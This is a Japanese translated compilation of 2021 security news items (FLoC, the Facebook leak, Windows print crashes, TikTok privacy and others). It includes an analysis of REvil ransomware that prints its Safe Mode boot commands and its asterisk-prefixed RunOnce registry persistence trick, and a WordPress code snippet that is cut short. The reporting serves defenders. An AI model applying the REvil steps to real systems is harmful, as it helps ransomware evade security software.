 Googleが、今月Google ChromeでFLoCをテストし始めた後、GoogleのFLoCの実装は、或るプライバシーリスクを別のリスクに置き換えるだけであるとするプライバシー擁護派のコンセンサスがあった。
 「FLoCは、サード-パーティー トラッカーが、それ自体で行っていたプロファイリングを、個々人のブラウザに実行させる新しい方法であり、このケースでは、最近のブラウジング行為を挙動別にラベル付し、これをWebサイトや広告主と共有することを意味している。」
 「このテクノロジは、サードパーティークッキーのリスクは回避するだろうが、このプロセス中で新しいリスクを作成するだろう。これは、差別や略奪をターゲットにすることを含む挙動広告で多くの最も酷い非プライバシー問題を悪化させる可能性がある」と、Electronic Frontier Foundation (EFF、電子フロンティア財団)は最近の
ブログへの投稿 で説明している。
 それ以来、Brave Browser, DuckDuckGo, Vivaldiのような他のプライバシーブラウザと検索エンジンの開発者は、彼らのソフトウェアや、それをブロックするために作成したソフトから
FLoCを完全に削除した 。
WordPressはFLoCをブロックすることを計画している 
 本日の新しいアナウンスで、WordPressは、GoogleのFLoCテクノロジにセキュリティ上の懸念があり、このブログ用ソフトウェアの来るバージョンで、このテクノロジをブロックするつもりであると述べている。
 「WordPressはWebの約41%を支えている。このコミュニティは、4行のコードで人種差別、性差別、反LGBTQ+差別、精神障害者に対する差別と闘うことを支援している」と、WordPressは発言している。
 WordPressは、以下の4行のコードを使用してFLoCを無効化することを計画している。これにより、FLoCをそのサイトで無効化するように告げるHTTPリクエストヘッダーを発行することを、このブログ プラットフォームに発生させる。
function disable_floc($headers) {
add_filter('wp_headers', 'disable_floc');
 
 WordPressは、一部の管理者が、このテクノロジを有効にしたいだろうと、これらの管理者は多分上述のコードをオーバーライドする技術的なノウハウを持っているだろうと説明している。WordPressはまた、管理者がFLoCを許可するか否かを制御することを可能にする設定を追加する可能性があると指摘している。
Microsoft Edgeのアップデート サーバーがダウン 
 BleepingComputer : News>Security(2021/04/16) 
 Microsoft Edgeのアップデートサーバは、世界的な停止に見舞われており、ユーザーは新しくリリースされた、このWebブラウザのバージョン90に更新できないでいる。
 昨日、Microsoftは、Kids Mode、新しいダウンロード ポップアップ、より良いフォント レンダリング、改善されたPDF印刷のような新しい機能の付属するEdge 90をリリースした。
 このアップデートはまた、今週Twitterでリリースされた0-Dayのリモートコード実行の脆弱性を修正しているので、早急にアップデートすることが多分適切な考えである。
 残念ながら、
今朝から 、ユーザはバージョン90にMicrosoft Edgeを自動アップデートすることが不可能になっており、代わりに、アップデートを実行した時に、以下の0x800421F7エラーが表示される。
「更新プログラムの確認中にエラーが発生しました: インターネットに接続できません。ファイアウォールを使用している場合は、MicrosoftEdgeUpdate.exe を許可リストに登録してください。 (エラー コード 7: 0x800421F7  -- system level)」
 
 今当に、BleepingComputerのテストで、このアップデートサーバは、以下に示すように依然として問題を持っている。
 この停止が長く続くとは思えないので、今日の後半には、ブラウザのヘルプ -> バージョン情報 に移動してMicrosoftEdgeの自動更新を試みることができるだろう。
 
 アップデート: Microsoftはこの問題を認識しており、この問題の解決に向けて作業中である。一部の人達は、数回アップデートを実行することで、アップデートに成功している。
Edit: 我々は本日のカナリアアップデートでも、この問題が発生しているとする報告を確認しています。安定版のエラーに加えて、この問題を調査していることを全ての方々が認識していること確認したかった。以下の潜在的な回避策を引き続き試してください。しばらく待ってから再度更新を試みるようにしてみてください。
 Edit: 一部のユーザーは、数回再試行することでこれが解決したことを発見しています。 引き続きアップデートをチェックして、機能するかどうかを確認してください。ただし、すべての人が機能するとは限りません。 詳細がわかり次第、この投稿を更新し続けます。 
 
Adobe: PhotoshopとDigital Editionの緊急の脆弱性を修正 
 BleepingComputer : News>Security(2021/04/13) 
 Adobeは、Adobe Photoshop, Adobe Digital Editions, Adobe Bridge, RoboHelp中のセキュリティ上の脆弱性を解決するセキュリティアップデートをリリースした。
 全体で、Adobeは、4つの製品に影響する10のセキュリティ上の脆弱性を解決した。それらのうちの7つは、任意のコード実行や任意のファイルを書き込むことを可能にする緊急と評価されるものである。
 本日セキュリティアップデートを受け取った全製品中、
Adobe Bridgeが最も多く 、4つの「緊急」のコード実行のバグと、「重要」と評価される2つの脆弱性が修正されている。
 コード実行のバグは、攻撃者がWindows中の殆ど全てのコマンド(マルウェアのインストールやコンピュータの乗っ取りを含む)を実行することが可能なので、最も深刻なものである。
 Adobe Bridgeのバグに追加して、Adobeはまた、以下を含む彼らの製品群の他の脆弱性も修正した。
 Adobeは、脆弱性のある製品を使用している顧客に、未パッチのインストレーションの脆弱性攻撃を成功に導くことが可能なこのバグを修正するために、可能な限り早急に、この最新バージョンにアップデートするようアドバイスしている。
 殆どの場合、ユーザは、その製品の自動アップデート機能を使用することによって、そのソフトウェアをアップデートすることができる。そのためには以下を使用する。
・ ヘルプ > アップデートの有無をチェック を実行する 
 この新しいアップデートが自動アップデートを介して利用できない場合は、上述の最新のダウンロード リンクに関連付けられているセキュリティ ブレチンをチェックしなさい。
Google ChromeはNATスリップストリーミング攻撃を防止するためにポート10080を封鎖 
 BleepingComputer : News>Security(2021/04/09) 
 Google Chromeは現在、NATスリップストリーミング2.0攻撃において悪用されているポートを防衛するために、HTTP, HTTPS, FTPのTCPポート10080へのアクセスをブロックしている。
 昨年、セキュリティ研究者Samy Kamkarは、
NATスリップストリーミング脆弱性の新しいバージョン を公開した。これは、悪意あるWebサイト上のスクリプトが、訪問者のNATファイアーウォールをバイパスすることができ、訪問者の内部ネットワーク上のあらゆるTCP/UDPポートへのアクセスの取得を可能にするものである。
 これらの脆弱性を使用すると、脅威のアクターは、ルータ設定の改竄、プライベート ネットワーク サービスへのアクセスの取得を含む幅広い攻撃を実行することができる。
 この脆弱性は、ルータのApplication Level Gateway (ALG)によってモニターされている特定のポート上でのみ機能するので、ブラウザ開発者は、多くのトラフィックを受け取らない脆弱なポートをブロックしてきた。
 現在、Coogle Chromeは、ポート69, 137, 161, 554, 1719, 1720, 1723, 5060, 5061, 6566へのFTP, HTTP, HTTPSアクセスをブロックしている。
 本日、Googleは、ChromeのTCPポート10080をブロックするつもりであると述べた。このポートに関しては、Firefoxが2020年11月に既にブロックしている。
 このポートをブロックすべきか否かの議論において、ブラウザ開発者は、AmandaバックアップソフトウェアとVMWare vCenterが、このポートを活用しているが、このポートのブロックによって影響を受けないと結論した。
 ポート10080をブロックした場合に最も懸念される点は、一部の開発者がポート80の代わりに、このポートを使用している可能性であったことである。
 「このポートは、末尾が"80"であり、UNIXシステムとの結びつけにルート権限を必要としないので魅力的なポートであった」と、Google Chromeの開発者Adam Riceは
説明 している。
 開発者が、このポートの継続使用を可能にするために、Riceは、開発者が、このブロックをオーバーライドするために使用できるエンタープライズ ポリシーを追加するだろう。
 ポートがブロックされると、ユーザは、このポートにアクセスを試みた時に、以下に示す 'ERR_UNSAFE_PORT'というエラーメッセージを表示される。
 あなたが現在、ポート10080上のWebサイトをホストしているのであれば、別のポートを使用して、Google Chromeが、そのサイトに継続してアクセスできるようにすることを検討しなさい。
Facebookのデータリークであなたの情報が晒されたか否かを確認する方法 
 BleepingComputer : News>Security(2021/04/04) 
 データ漏洩通知サービスHave I Been Pwnedは、昨日の5億を超えるユーザの電話番号と情報を含むFacebookのデータリークで、あなたのデータが晒されているか否かをチェックすることを可能にした。
 昨日、脅威のアクターは、533,313,128のFacebookユーザの個人情報(【訳注】 4/5日付毎日新聞朝刊は、日本人のデータ漏洩は42万人と報道しています)をハッキングフォーラムにリリースした。このデータには、携帯電話番号、名前、性別、場所、既婚や未婚の状況、職業、生年月日、eMailアドレスを含んでいる。
 このデータは、Facebookの'Add Friend'機能のバグを使用して2019年に収集された後、当初は、個人随意契約で販売された。これが発見された後、Facebookは直ちにこの脆弱性を閉じたが、脅威のアクターは、昨日最終的に実質無料($2.19)になるまで、このデータを流し続けた。
 それ以来、
Troy Hunt は、Faceookメンバーのデータがこのリーク中で晒されているか否かをユーザが決定する支援として、彼が所有するHave I Been Pwnedデータ漏洩通知サービスにリークされたデータを追加した。
 Have I Been Pwnedに精通していない人々のために、このサイトは、データ漏洩で晒されたデータをインデックス化しているので、ユーザはメールアドレスをインプットしデータが晒されているデータ漏洩を一覧表示できる優秀なリソースである。
 Faceookリークが、あなたのメールアドレスを含んでいるか否かチェックするには、
Have I Been Pwned にアクセスし、検索フィールドにeMailアドレスを入力する、'pwned?'ボタンをクリックすると、eMailが晒されているデータ漏洩の全てのリストが表示される。
 例えば、以下の画像は、私が昨日のFacebookリークで晒されたことが判明しているeMailアドレスを使用した検索結果である。見ての通り、、
Have I Been Pwned は、このeMailアドレスが昨日リリースされたFacebookのデータ中に発見されたと通知してきている。
 残念ながら、昨日のFacebookリークで最も一般的なユーザー識別が可能なフィールドは電話番号である。 ただし、5億3300万のFacebookメンバーのレコードのうち、eMailアドレスが含まれているものは250万にすぎない。
 このことから、あなたのeMailアドレスを検索し、Have I Been Pwnedが一致しないとする結果を戻してきたにしても、あなたは依然として、昨日のリークの一部である可能性は存在している。
 Troyは、ユーザーが電話番号を入力して、Facebookのリークで晒されているか否かを確認する方法を検討しているとツイートしている。
 Huntは昨日「それがロードされたメールアドレスだ」と、そして「私はまだ電話番号をどうするか考えている」と
ツイート している。
5億3300万Facebookユーザの電話番号がハッカーフォーラムにリークされた 
 BleepingComputer : News>Security(2021/04/03) 
 世界中のおよそ5億3300万Facebookユーザの携帯電話番号と他の個人情報が、人気のあるハッカーフォーラムに無料でリークされた。
 この盗まれたデータは、2020年6月にハッキングコミュニティに現れたのが最初であり、この時はFacebookデータを他のメンバーに販売していた。このリークを目立たせているものは、各アカウントに関連付けられている公開されているプロファイルと個人の携帯電話番号から取得することのできるメンバー情報を含んでいることにある。
 この販売されたデータは、533,313,128 Facebookユーザの情報(メンバーの携帯番号、Facebook ID、名前、性別、場所、既婚や未婚の状況、職業、生年月日、eMailアドレス)を含んでいた。
 BleepingComputerによって確認されたFacebookデータのサンプルから、殆ど全てのユーザのレコードは、携帯電話番号、Facebook ID、名前、性別を含んでいる。
 以下は、米国のレコードの小さなサンプルであり、ニューヨークの917モバイル市外局番で始まる訂正済みの携帯電話番号を示している。
 Alon Gal (サイバー犯罪インテリジェンス企業のCTO、Hudson Rock)によると、脅威のアクターは、2019年に現在はパッチされてているが、脅威のアクターがメンバーの電話番号にアクセスすることを可能にしていたFacebookの"Add Friend"機能を脆弱性攻撃したと信じられている。
 この主張されている脆弱性が、脅威のアクターにリークされたデータ中の全ての情報を取得することを可能にしたのか、あるいは、電話番号だけなのかは分かっていない。そして、これらの情報は公開されているプロファイルから収集された情報と結合された。
 当初のデータの販売($30,000と信じられている)の後、他の脅威のアクターは、プライベートTelegramボットを作成した。これは、他の脅威のアクターが金銭を支払うことでFacebookデータを介した検索を可能にするものである。
Facebookデータ リークは無料でリリースされた 
 本日、このFacebookデータ リークは、ハッカーフォーラムの貨幣形式である 8 site 'credits'(およそ$2.19)で同じハッカーフォーラムに実質無料でリリースされた(この部分は和訳を変更しています)。
 データ漏洩は、当初高価格で随意契約売買されていたが、これは、ハッカーコミュニティ内で評判を得るための方法として、それらが最終的に無料になるまで低価格化されて販売されることが通常である。
 「毎度のことであるが、それが無料でリークされるまで、より安価で販売し始める」と、GalはBleepingComputerとの会話の中で述べている。
 このデータリーク中には、Facebookの三人の共同設立者Mark Zuckerberg, Chris Hughes, Dustin Moskovitzの電話番号も含まれていた。このデータは、Facebookに最初に登録された4番目、5番目。6番目のメンバーである。
 このデータリークに関連する我々の質問に対応して、Facebookは、このデータは2019年に収穫されたものと同じデータであるとBleepingComputerに告げた。
 「これは以前、2019年に報道された古いデータである。我々は発見し、2019年8月にこの問題を修正した」とFacebookのスポークスマンはBleepingComputerに告げている。
 このデータは2019年のものかもしれないが、電話番号やeMailアドレスは長年に渡り同じままであるのが一般的であるので、これは脅威のアクターにとって価値のあるものである。
 脅威のアクターによって説明されているように、漏洩されたメンバーの地勢学上のTop20のリストは以下である。
	国名・地域 
	ユーザ数 
	 
	エジプト
	 
	44,823,547
	 
 
	チュニジア
	 
	39,526,412
	 
 
	イタリア
	 
	35,677,323
	 
 
	アメリカ
	 
	32,315,282
	 
 
	サウジアラビア
	 
	28,804,686
	 
 
	フランス
	 
	19,848,559
	 
 
	トルコ
	 
	19,638,821
	 
 
	モロッコ
	 
	18,939,198
	 
 
	コロンビア
	 
	17,957,908
	 
 
	イラク
	 
	17,116,398
	 
 
	アフリカ
	 
	14,323,766
	 
 
	メキシコ
	 
	13,330,561
	 
 
	マレーシア
	 
	11,675,894
	 
 
	イギリス
	 
	11,522,328
	 
 
	アルジェリア
	 
	11,505,898
	 
 
	スペイン
	 
	10,894,206
	 
 
	ロシア
	 
	9,996,405
	 
 
	スーダン
	 
	9,464,772
	 
 
	ナイジェリア
	 
	9,000,131
	 
 
	ペルー
	 
	8,075,317
	 
 
 
データは攻撃を指揮するために使用される 
 このリリースは、ハッカーフォーラムの他の脅威アクターに熱狂的に受け入れられている。これは、彼らがデータリークにリストされている人々に攻撃を仕掛けるために使用できるからである。
 例えば、脅威のアクターは、フィッシング攻撃に電子メールアドレスを、スミッシング(モバイルテキスト フィッシング)攻撃に携帯電話番号を使用することができる。
 脅威のアクターは、SIMスワップ攻撃(【訳注】SIMスワップ攻撃に関する詳細な情報は、
Sophosのサイト を参照)を実行するために携帯電話番号と漏洩した情報を使用することで、SMSを介して送信される多段階認証コードを盗むことができる。
 全てのFacebookユーザーは、詳細情報を要求したり、メール内のリンクをクリックするように指示したりする奇妙な電子メールやテキストに注意することを勧める。
 BleepingComputerはデータリークついてFacebookに連絡したが、現時点では回答を受け取っていない。
REvil身代金要求型マルウェア、「Windowsセーフモード」暗号化モードを搭載 
 BleepingComputer : News>Security(2021/03/21) 
 REvil身代金要求型マルウェアは、おそらくセキュリティソフトの検出を回避し、ファイルの暗号化の大きな成功をもたらすために、Windowsセーフモードでファイルを暗号化する機能を追加した。
 Windowsセーフモードは、ユーザが管理者特権で実行でき、オペレーティングシステム上のタスクを調査することを可能にする特別な起動モードである。このモードは、オペレーティングシステムが動作するために要求される最小のソフトウェアとドライバでロードされる。
 更に、Windowsにインストールされ自動的に起動するように設定されているあらゆるプログラムは、それらプログラムの
autoun (自動起動)が、特定の方法で設定されている場合を除いて、セーフモードでは起動することはない。
 Windowsでautorunを作成する方法の一つは、レジストリで以下のようなエントリを作成することである。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 
 
 'RunOnce'キーは一度だけプログラムを起動し、次にレジストリからこのエントリを削除するが、'Run'キーは、ユーザがログインする度にプログラムを起動する。
 例えば、以下のレジストリキーは、ユーザがログインするとC:\Users\test\test.exeプログラムを自動的に起動する。
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Startup"="C:\Users\test\test.exe"
 
 しかしながら、このオートランは、以下のようにバリュー名の冒頭にアスタリスク(*)を追加した場合を除き、セーフモードでは起動しない。
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"*Startup"="C:\Users\test\test.exe"
 
REvilは現在「セーフモード」モードを搭載している 
 MalwareHunterTeam によって発見されたREvilの新しいサンプルで、新しく追加された -smode コマンドライン引数は、デバイスを暗号化する前にセーフモードで再起動することをコンピュータに強制する。
 これを実行するために、REvilは、Windowsが再起動した時にSafe Mode with Networkingで強制的にコンピュータをブートするために以下のコマンドを実行する。
 
bootcfg /raw /a /safeboot:network /id 1 
 次に、ユーザーがセーフモードでログインした後、'bcdedit / deletevalue {current} safeboot'を実行する'* franceisshit'と呼ばれる'RunOnce'オートランを作成する。
 最後に、この身代金要求型マルウェアは、ユーザが中断できないWindows再起動を強制的に実行する。
 このプロセスが終了する直前に、考えようによってはワクチン使用に関するフランスの最近の審議に関する可能性のある'AstraZeneca'(アストラゼネカ)と名付けられた追加のRunOnceを作成する。
 このautorunは、デバイスが再起動された後、次にユーザがログインした時に -smode 引数なしにREvil身代金要求型マルウェアを再起動する。
 これら二つの'RunOnce'エントリが、セーフモードでログインした後に実行され、次に自動的にWindowsによって削除されることを憶えておくことは重要である。
 再起動で、このデバイスはSafe Mode With Networkingで起動する。そして、ユーザはWindowsにログインすることを促される。一旦ログインすると、REvil身代金要求型マルウェアは、-smode 引数なしに実行され、そのデバイス上のファイルの暗号化を開始する。
 Windowsはまた、この身代金要求型マルウェアが終了した時に、通常モードでこのマシンを再起動するように'*AstraZeneca'レジストリキーによって設定された
 'bcdedit /deletevalue {current} safeboot' を実行する。
 REvilがファイルを暗号化している間、セーフモード画面はブランクになるが、Windowsタスクマネージャを起動するためのCtrl+Alt+Deleteを使用することは依然として可能である。そこから、ユーザは、実行中の実行ファイルを確認できる。我々のテストにおいて、以下に示すように、これは'smode.exe,'と名付けられていた。
 起動している間、この身代金要求型マルウェアは、このデバイスの暗号化を終了するまで、タスクマネージャからあらゆるプログラムを起動することを妨げる。
 このデバイスが暗号化されると、残りのブートアップシーケンスを実行できるようになり、このデスクトップには、脅迫文が表示され、ファイルは暗号化されている。
異常なアプローチ 
 REvilの新しいセーフモード オペレーションは、セーフモードで再起動した後、ユーザがこのデバイスにログインすることを要求するので多少奇妙である。
 更に、ユーザがセーフモードにログインすると、ブランク画面が表示される。そして、この身代金要求型マルウェアがこのデバイスを暗号化する時、デバイスに大きなスラッシング(【訳注】 コンピュータが搭載するメインメモリの容量に対して実行中のプログラムが使おうとするメモリ容量が過大なため、メモリとストレージとの間で内容の入れ替え( ページング /スワッピング)が頻繁に起き、処理がなかなか進まない状態のこと(IT用語辞典より))が発生する。
 この挙動は、即座にユーザに疑念を発生させ、彼らのコンピュータを安全にするためにハイバーネートやシャットダウンを行うことになる。
 この理由から、攻撃者は、問題を発生させることなく暗号化したい特定のコンピュータ(仮想マシンやサーバのような)に対して新しいセーフモードコマンドを手動で実行することを可能にしている。
 この理由にも拘わらず、これは、身代金要求型マルウェアのギャングが、常に彼らの戦略を発展させていることなので、セキュリティ専門家やWindowsの管理者が監視しておく必要のある攻撃の新手法である。
 REvilはデバイスを暗号化するためにセーフモードを悪用する唯一のオペレーションではない。
 2019年に、'Snatch'として知られる別の身代金要求型マルウェアが、Windowsサービスを使用してセーフモードでデバイスを暗号化する
機能を追加 している。
Microsoft: 3月のアップデートで発生する更なる印刷問題を警告 
 BleepingComputer : News>Security(2021/03/18) 
 Microsoftは、今月初旬にリリースしたWindows 10のアップデートをインストールした後、顧客は死のブルースクリーンの他に、更なる印刷問題が発生するかもしれないと発言している。
 Microsoftによると、これら最近のWindows 10アップデートは、幾つかのアプリケーションからの印刷時に、あるいは一部のプリンタへの印刷時に問題を発生する。これらの問題は、グラフィックの欠落や単色化、位置ズレや書式設定問題、ページやラベル印刷で空白印刷されるなどの問題が含まれる。
 
 「2021年03月09日もしくは03月15日にリリースされたアップデートをインストールした後、一部のアプリケーションから印刷した時、ユーザは予期しない結果を得るかもしれない」と、このアップデートに関してWindows 10 Health Dashboardで発言している。
 Microsoftによって強調された印刷問題は、
・ バーコード、QRコード、ロゴのようなグラフィックスを含むドキュメントの要素が、白黒やカラーボックスで印刷される、あるいは欠落する可能性がある。 
影響を受けるプラットフォームと問題となっているアップデート 
 影響を受けるプラットフォームは、Windows 7以降のWindowsバージョンの広汎な範囲のクライアント版とサーバ版が含まれる。
・ クライアント版: Windows 10, version 20H2; Windows 10, version 2004; Windows 10, version 1909; Windows 10, version 1809; Windows 10 Enterprise LTSC 2019; Windows 10, version 1803; Windows 10 Enterprise LTSC 2016; Windows 10, version 1607; Windows 10 Enterprise 2015 LTSB; Windows 8.1; Windows 7 SP1 
 印刷時に問題を発生させる累積アップデートは、
・ Windows 10 2004/20H2 と Windows Server 2004/20H2用のKB5000802 KB5000808 KB5000822 KB5000809  
 Microsoftは、これらの問題に関する修正を作業中であり、近日中に解決策が提供されるだろう。
進行中のWindows印刷問題 
 Windowsデバイス上で印刷に影響を与えるこれらの新しい問題は、印刷時に死のブルースクリーンを発生させるバグを修正した
複数の定例外Windows 10累積アップデート のリリースと続いた。
 クラッシュ問題の修正を主張したにも関わらず、複数のBleepingComputerの読者は、依然としてMicrosoftが本日の更新で発言したブルースクリーン クラッシュと一部の問題を経験していると
レポートしていた 。
 Microsoftは、BleepingComputerが印刷中のシステムクラッシュに関する
一連のユーザーからの苦情 を報告した後、Windows 10のBSODクラッシュを引き起こす既知の問題を
確認した 。
 OOB(定例外)更新プログラムを発行する前に、Microsoftは、一部の顧客が
あまりにも複雑 とした手順を改良したこのクラッシュの一時的な修正も提供している。  
BlenderのWebサイトはハックングを企てられた後メンテナンスモードに 
 BleepingComputer : News>Security(2021/03/15) 
 Blender.org(人気のある3Dコンピュータ グラフィックソフトウェアBlenderの公式Webサイト)は、サイトに表示されているメッセージによると現在メンテナンスモードになっている。
 「 http://blender.org Webサイトは、ハッキングを企てられたことによりメンテナンス下にある」と、本日早朝Twitter上のBlender公式アカウントは表明しており、更に「このWebサイトは可能な限り早急に復活するだろう」と追加している。
 「 Wiki, 開発者ポータル, git(【訳注】 分散型バージョン管理システム)リポジトリ, http://blender.chat等を含む殆どの基本的な機能は、通常通り利用可能である」とBlenderは
追加 している。
 Blenderによると、blender.orgのWebサイトの一部とブログの一部が依然としてダウンしたままであり、数時間オフラインのままになっている。
 このサイトのホームページは、通常通り稼働し続けているが、このサイトの他の部分では、"This page is not available"エラーを表示し、訪問者には"a copy on the Internet Archive."(インターネット・アーカイブのコピー)をチェックするよう訪問者に促している。
 Blenderは、ダウンロードできる全てのファイルに関してchecksum(チェックサム)が検証され、ダウンロードしても安全であると考えていると発言している。
 また、
download.blender.org/release/ や
公式のダウンロードページ (再び利用可能になった後)に、Linux, Windows, macOS用の全てのリリースで利用可能なMD5やSHA256ハッシュを使用して、Blenderのサーバや他の全てのミラーからダウンロードできる全てのファイルのチェックサムをチェックすることができる。
 「http://blender.org Webサイト(そして、他のブログ)は、もう数時間オフラインのままだろう」と、「チェックサムは検証された、Blenderのダウンロードは安全であると考えられる」と、Blenderは追加している。
 cloud.blender.orgにホストされているBlenderトレーニングビデオにアクセスするためのBlender Cloud Webベースサービスは、この攻撃の
影響を受けていない 。このハッキングの試みは、このWebサイトの www サブドメインに影響を与えただけである。
 BlenderのTwitterへのリンク 
 BleepingComputerは詳細に関してBlenderのスポークスマンに問い合わせているが、回答は戻ってきていない。
 これは現在進行中の問題である。
Windows 10はMicrosoftの3月の定例パッチにより印刷している時にクラッシュする 
 BleepingComputer : News>Security(2021/03/10) 
 昨日リリースされたWindows 10の KB5000802とKB5000808累積アップデートは、ネットワークプリンタに印刷している時にBlue Screen of Death(死のブルースクリーン)を発生している。
 昨日、
2021年3月の定例アップデート の一部として、Microsoftは、
Windows 10 KB5000802とKB5000808累積アップデート をリリースした。
 それ以来、印刷している時、Windows 10で"APC_INDEX_MISMATCH for win32kfull.sys"死のブルースクリーンクラッシュが発生するという定常的な不平不満の流れがある。
 Reditでのシステム管理者の投稿[
1 ,
2 ]によると、昨日KB5000802とKB5000808のアップデートをインストールし、印刷しようとすると、Windows 10のクラッシュは即座に始まった。
 「ハイ、Jen。私自身を含め
r/sysadmin にいる何人かは、京セラKXドライバ タイプ3を使用してWindows Serverプリンタシェアに印刷ジョブを送信している時に、アップデート後(少なくともWin10 20H2以降)BSODを見ている(即ち、KXドライバ タイプ4や他の一般的なタイプ3/4ドライバは、この問題を提示しない)」と、あるRedditのユーザは投稿している。
 「KB5000802は、私の或るクライアントのところの全ての京セラの印刷を切断した。昨年6月の印刷の問題と同じ形でのBSODである」と、他のユーザは確認している。通常の修正方法は何れも機能しないようだと述べている。
 影響を受けることが認識されているプリンタメーカーの一部には、京セラ、リコー、ダイモが含まれている。
 昨日これらのアップデートを受信した仮想マシンを使用して、BleepingComputerは、3月のプレビュー版のアップデートに戻したところ、最早昨日のようにKB5000802累積アップデートは提供されなかった。
 これは、Microsoftが問題を調査している間に、このアップデートをWindows Updateから引き抜いたことを示している。しかしながら、このアップデートは依然として、
Microsoft Update カタログ から入手可能である。
 更に、我々の一部のマシンは、2月24日にリリースされたKB4601382プレビュー版の累積アップデートを提供されているが、昨日のKB5000802は存在していない。これは、おそらくセキュリティアップデートがクラッシュを発生させている可能性を示している。
 昨日、Microsoftは、Windowsプリントスプーラの特権の昇格の脆弱性を修正する二つのセキュリティアップデート(
CVE-2021-1640 、
CVE-2021-26878 として追跡される)をリリースした。
 Microsoftは、先月に提供したプレビュー版の累積アップデートにはセキュリティアップデートを含めていなかった。これが、おそらくプレビュー版のユーザが印刷時に同じクラッシュを経験をしなかった理由である。
 2020年6月の定例アップデートで、ユーザが印刷できないようにする
バグもまた導入された 。この印刷問題を解決するために、MicrosoftはWindowsユーザのために
定例外アップデートをリリースした 。
印刷時にwin32kfull.sysクラッシュを修正する方法 
 残念ながら、プリンタドライバをアップデートすることでこの問題の修正を試したが、大概は不成功であった。
 代わりに、Windows 10ユーザは、KB5000802もしくはKB5000808アップデートを強制的にアンインストールすることで、印刷は再び正しく動作するようになる。
 印刷バグで影響を受けているのであれば、アプリケーションを終了させ、コマンドプロンプトを起動することでWindows 10 KB5000802累積アップデートをアンインストールすることができる。コマンドプロンプトで、以下のコマンドを入力しなさい。
wusa /uninstall /kb:5000802
 
 Windows 10 KB5000808累積アップデートをアンインストールするには、以下のコマンドを代わりに使用する
 
wusa /uninstall /kb:5000808
 
 アップデートをアンインストールする詳細なヘルプに関しては、
このガイドを使用しなさい 。
 BleepingComputerはさらなる情報を求めてMicrosoftにコンタクトしたが、未だ回答はない。
TikTocを使用しているか? 6つのセキュリティチップをチェックしよう 
 Sophos : Naked Security(2021/03/04) 
 TikTokは、中国企業ByteDanceが所有し、ユーザが3秒~1分の長さの範囲の短いビデオを作成・共有するビデオ-シェアリング サービスである。
 TikTokは、2005年のMySpace、2008年のFacebook、最近では2014年頃のInstagramとSnapchatに続いてソーシャルメディアの王座にある最新のアプリケーションである。
 否が応でも、TikTokの最近の人気を否定することはできない。TikTokの成功の大部分は、他の人気あるアプリケーションが今まで実行したことのない相互通信のより新しく、より一意の方法を提供しているためである。
 このアプリケーションは、2016年に稼働したが、2020年はTikTokが支配した年であった。これは、おそらく新型コロナウィルスのパンデミックに起因して、多くの人々が突然、馬鹿げたビデオを視聴し、それらを友人に送る、あるいは、馬鹿げたビデオの作成に参加したりするための多くの時間を持ったことを意味している。
味方か敵か? 
 世界的な人気にも関わらず、多くの人々と政府は、2020年6月にインド政府が、他の58の中国系電話アプリケーションと共に
ソーシャルメディアプラットフォームを締め出した こともあり、TikTokに関するサイバーセキュリティ上の懸念を持っている。
 セキュリティ上の懸念の大部分は、TikTokが中国企業であることに集中している。インド政府によると、中国の法律が、その国の企業は政府と情報を共有する必要があるとしているために、TikTokは安全保障上の脅威となった。
 このアプリケーションの人気は継続し、米国の10代の間で成長しているので、米国は、中国政府にこれまで以上に及ぶ範囲の巨大化の可能性を懸念して、2019年にTikTokの
調査を発動した 。
 
Wells Fargo を含む幾つかの米国企業は、企業所有のデバイスからTikTokアプリケーションを削除するように従業員に求めた。既に米軍は官給の電話からTikTokを締め出している。
 これらの懸念にも関わらず、TikTokが誰かから情報を「盗んだ」とする確たる証拠を共有した者はいない。
 そうは言っても、あなたが使用しているプラットフォームが何であれ(TikTok, Facebook, Twitter等)、常に、あなたが共有している全てのデータは、いつか公開されたり他の人々の手に渡る可能性があるということを疑うことから始めるのがベストである。
 TikTokを使用することを決めたのであれば(全てのソーシャルメディア プラットフォームで同じことがあてはまる)、あなたが何を共有しているのかに注意しなさい、そして、如何なる(【訳者補注】モバイル・アプリケーションの)固有セキュリティやプライバシーを想定しないようにしなさい。
TikTokを安全にする6つのヒント 
 TikTok上であなた自身の安全を守りたい、あるいは、子供や若い人々を保護したいかに拘わらず、TikTokを使用している時に、あなたのセキュリティとプライバシーを最大にするための支援となる幾つかのヒントを以下に示す。
1. 必ずTikTokアカウントをPrivate(非公開)にする 
 本質的にあなたのアカウントをPrivate(非公開)にすることは、誰かがフォローする前に、その人が承認される必要があることを意味している。これは、あなたのビデオや「いいね」に友人だけがアクセスできることを保証することになる。
 Settings > Privacy and Safety(設定 > プライバシー設定)に進み、見出しのDiscoverability(見つけやすさ)を探しなさい。
 この機能をアクティベートするには、Private Account(非公開アカウント)オプションをONにしなさい。
2. 他の人があなたを見つけることを許可しない 
 Defaultで、TikTokは、あなたが知らない人々の"For you"ページに、それを掲載することによってあなたのコンテンツを共有する。あなたが見知らぬ人にビデオを見られたくないのであれば、上図に示したSuggest your account to others(あなたのアカウントを他のユーザにおすすめ表示する)オプションをOFFにしなさい。
 この設定をOFFにすることで、あなたのアカウントは他のユーザに推奨されなくなり、他の人々が検索エンジンを介してあなたのアカウントを発見することができなくなる。
3. 双方向通信を許可しない 
 TikTokユーザは、複数の方法であなたのアカウントとコンテンツと双方向に通信することができる(それを閲覧したり、ダウンロードしたり、あなたに直接メッセージしたり、ビデオでデュエットしたり)。
 これら双方向通信のDefault設定はONである。しかし、あなたは、Friend(即ち、あなたのアカウントをフォローすることを許可した人々のみ、あなたのコンテンツと双方向通信することができる)やOFFに変更するオプションを持っている。
 他のユーザがあなたのビデオと相互通信することができる方法を制限するには、Privacy(プライバシー設定)ページのSafety(安全フィルター)セクションに進む。
 双方向通信をブロックすると、コメント、デュエット、リアクションを停止し、他の人があなたのメッセージや「いいね」したビデオの閲覧を妨げることになる。
 メッセージをブロックすることは、TikTokユーザがプライベートにチャットする方法(悪意ある誰かによって簡単に悪用される機能)なので特に重要である。
4. 利用時間を管理する 
 TikTokは中毒性の高いものであり、平均的ユーザは短いビデオのスクロールに1日52分費やしている。
 このアプリケーションの時間を制限したいのであれば、Settings & Privacy(プライバシー設定)のページのDigital Wellbeing(デジタルウェルビーイング)セクションに進む。時間制限するには Screen Time Management(使用時間制限モード)を使用する
